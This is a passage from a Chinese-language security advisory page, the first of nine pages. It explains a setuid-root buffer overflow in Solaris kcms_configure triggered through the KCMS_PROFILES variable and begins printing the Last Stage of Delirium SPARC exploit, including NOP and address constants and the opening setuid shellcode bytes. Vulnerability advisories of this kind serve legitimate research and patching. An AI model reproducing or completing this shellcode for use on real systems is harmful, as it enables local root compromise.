　　kcms_configure使用到环境变量KCMS_PROFILES，而动态链接库kCSS技巧">CSSUNWIOsolf.so提供了对环境变量KCMS_PROFILES的解析功能。如果该环境变量的值超长，运行kcms_configure时就会发生缓冲区溢出，因为kcms_configure是setuid-to-root的，本地攻击者将获取root权限。

　　测试程序：

　　警告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

　　LSD了提供两种平台的测试程序

　　SPARC平台：
/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/
#*/
/*## kcsSUNWIOsolf.so
#*/

#define NOPNUM 940
#define ADRNUM 32
#define PCHNUM 204

char setuidcode[]=
    "\x90\x08\x3f\xff"     /* and     %g0,-1,%o0           */
    "\x82\x10\x20\x17"     /* mov     0x17,%g1             */
    "\x91\xd0\x20\x08"     /* ta      8                    */

1.Solaris kcms_configure 缓冲区溢出漏洞(1)
2.Solaris kcms_configure 缓冲区溢出漏洞(2)
3.Solaris kcms_configure 缓冲区溢出漏洞(3)
4.Solaris kcms_configure 缓冲区溢出漏洞(4)
5.Solaris kcms_configure 缓冲区溢出漏洞(5)
6.Solaris kcms_configure 缓冲区溢出漏洞(6)
7.Solaris kcms_configure 缓冲区溢出漏洞(7)
8.Solaris kcms_configure 缓冲区溢出漏洞(8)
9.Solaris kcms_configure 缓冲区溢出漏洞(9)

共9页 9 7 [1] [2] [3] [4] [5] [6] [7] [8] [9] 8 :>

Solaris kcms_configure 缓冲区溢出漏洞相关文章：

Solaris kcms_configure 缓冲区溢出漏洞相关软件：

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
转载请注明来源：http://www.xgdown.com